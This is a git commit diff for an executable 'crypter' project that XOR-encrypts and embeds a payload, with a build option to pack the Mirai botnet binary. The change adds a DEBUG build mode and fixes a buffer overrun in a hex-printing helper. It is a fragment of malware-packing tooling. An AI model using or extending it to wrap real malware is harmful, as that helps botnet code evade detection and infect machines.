diff options
| author | segfault <segfault@secmail.pro> | 2019-02-08 14:11:12 +0100 |
|---|---|---|
| committer | segfault <segfault@secmail.pro> | 2019-02-08 14:11:12 +0100 |
| commit | 5fe92a79214f6f892390b4145cb8fe4c82a6c1f9 (patch) | |
| tree | 5b15c90a72d7060265b8457a712f85ea70a16c19 | |
| parent | 20d93a3d4a298fcff05504d0fbfb8ee758f318e6 (diff) | |
Makefile: added DEBUG mode
crypter: fixed possible write-out-of-bounds error
Signed-off-by: segfault <segfault@secmail.pro>
| -rw-r--r-- | Makefile | 7 | ||||
| -rw-r--r-- | exec_crypter.c | 8 |
2 files changed, 12 insertions, 3 deletions
@@ -11,6 +11,9 @@ endif ifeq ($(USE_MIRAI),y) USE_PAYLOAD := mirai.x86 endif +ifeq ($(DEBUG),y) +CFLAGS += -g +endif all: exec_crypter @@ -18,6 +21,7 @@ all: exec_crypter ifeq ($(USE_PAYLOAD),) exec_payload: exec_payload.c $(CC) $(CFLAGS) -o $@ $< +ifneq ($(DEBUG),y) $(STRIP) -s \ --remove-section=.comment \ --remove-section=.eh_frame \ @@ -25,6 +29,7 @@ exec_payload: exec_payload.c --remove-section=.jcr \ --remove-section=.gcc_except_table \ $@ +endif else exec_payload: $(USE_PAYLOAD) $(CP) -v $(USE_PAYLOAD) $@ @@ -38,6 +43,7 @@ exec_crypter.o: exec_crypter.c exec_crypter: include_payload.o exec_crypter.o $(CC) $(CFLAGS) -o $@ include_payload.o exec_crypter.o +ifneq ($(DEBUG),y) $(STRIP) -s \ --remove-section=.comment \ --remove-section=.eh_frame \ @@ -45,6 +51,7 @@ exec_crypter: include_payload.o exec_crypter.o --remove-section=.jcr \ --remove-section=.gcc_except_table \ $@ +endif clean: $(RM) -f exec_payload include_payload.o exec_crypter.o exec_crypter .exec_crypter diff --git a/exec_crypter.c b/exec_crypter.c index e8763e5..706708a 100644 --- a/exec_crypter.c +++ b/exec_crypter.c @@ -96,7 +96,7 @@ shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen) static const char hexal[] = "0123456789ABCDEF"; uint8_t halfByte; - for (i = 0, j = 0; i < buflen && j < destlen; ++i, j += 3) { + for (i = 0, j = 0; i < buflen && j+2 < destlen; ++i, j += 3) { halfByte = buf[i] >> 4; dest[j+0] = hexal[ halfByte % 16 ]; halfByte = buf[i] & 0x0F; @@ -104,7 +104,9 @@ shexbuf(uint8_t *buf, size_t buflen, char *dest, size_t destlen) dest[j+2] = ' '; } - dest[j+2] = 0; + if (j) + dest[j-1] = 0; + return dest; } @@ -179,7 +181,7 @@ int main(int argc, char **argv) { * assume that our payload is unencrypted */ xor_genkey(trailer); - printf("\nEmpty XOR key .. generated: %s\n", + printf("\nEmpty XOR key .. generated: '%s'\n", shexbuf((uint8_t *) trailer->xorkey, sizeof trailer->xorkey, temp, sizeof temp)); |